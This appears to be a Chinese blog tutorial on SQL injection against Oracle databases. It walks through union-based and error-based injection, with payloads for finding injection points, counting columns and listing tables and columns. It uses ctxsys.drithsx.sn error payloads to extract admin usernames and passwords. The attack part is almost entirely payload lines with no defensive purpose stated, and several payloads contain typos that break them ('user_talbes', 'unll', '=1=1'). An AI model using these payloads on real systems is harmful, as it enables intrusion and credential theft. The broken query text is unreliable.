本文内容:

  • 注入函数解析
  • oracle报错注入函数解析
  • oracle注入+联合查询[union all]
  • oracle报错注入具体流程
          • -

1,注入函数解析:

Dual是一个实表[也有说它是虚表],如果你直接查询它,它只显示一个X,列名为DUMMY.

像Mysql这样的语句:select1,2,3oracle是绝对不能运行,但是又想运行怎么办,oracle就提供了一个虚表Dual。


作用:为了满足sql这语句的结构,为了严禁的语法。

oracle可以调用系统函数,还可以进行加减法运算。

oracle弱化了库的概念,它以用户名作为区分,用户名=库名。

select * from all_tables 查询所有的表

select * from user_tables 查询出当前用户的表

select * from all_tab_columns 查询出所有的字段

select * from user_tab_columns 查询出当前用户的字段

对于oracle想取第一条之后的数据可以使用:rownum=1[限制查询返回的总行数为一条]和<>不等于相结合

用法:and 字段名<>记录[数据]

2,oracle报错输入函数解析:

ctxsys.drithsx.sn(user,(select banner from v$version where rownum=1))

查询关于主题的对应关键词,然后因为查询失败(应该是这个用户没有创建和查询的权限,默认情况没有创建,爆出未查询到的错误从而爆出查询的内容)。

报错注入的核心:使数据库出错,然后强行丢出一个致命性的错误,这个错误信息里面的内容我们可以控制。

3,oracle注入+联合查询[union all]

联合查询:[判断注入点、判断字段数、判断输出点、查询表、查询数据]

例题:elect *from aabb where id='1'

1.判断是否存在sql注入:

'and 1=1 和 ' and 1=2 -- qwe

2.判断字段数:

'order by 1…… -- qwe

3.判断输出点:

' union select null,null,null,……, from Dual -- qwe

4.查询表:

' union select null,null,table_name from user_talbes -- qwe

5.查询字段:

' union select unll,null,column_name from user_tab_columns -- qwe

6.查询数据:

' union select unll,null,pw from admin -- qwe

解释:pw、admin是查询出来的字段和表。

4,报错注入具体流程:

1.判断是否存在sql注入:

'and =1=1 和and 1=2 -- qwe

2.使用报错函数,获取表名:

'and 1 = ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))

3.使用报错函数,获取字段名:

'and 1= ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='admin' rownum=1)) -- qwe

4.使用报错函数,获取数据:

'and 1= ctxsys.drithsx.sn(1,(select upass from admin where rownum=1 and uname='xx')) -- qwe

标签: 报错, oracle, 查询, select, Oracle, 注入, qwe

相关文章推荐

添加新评论,含*的栏目为必填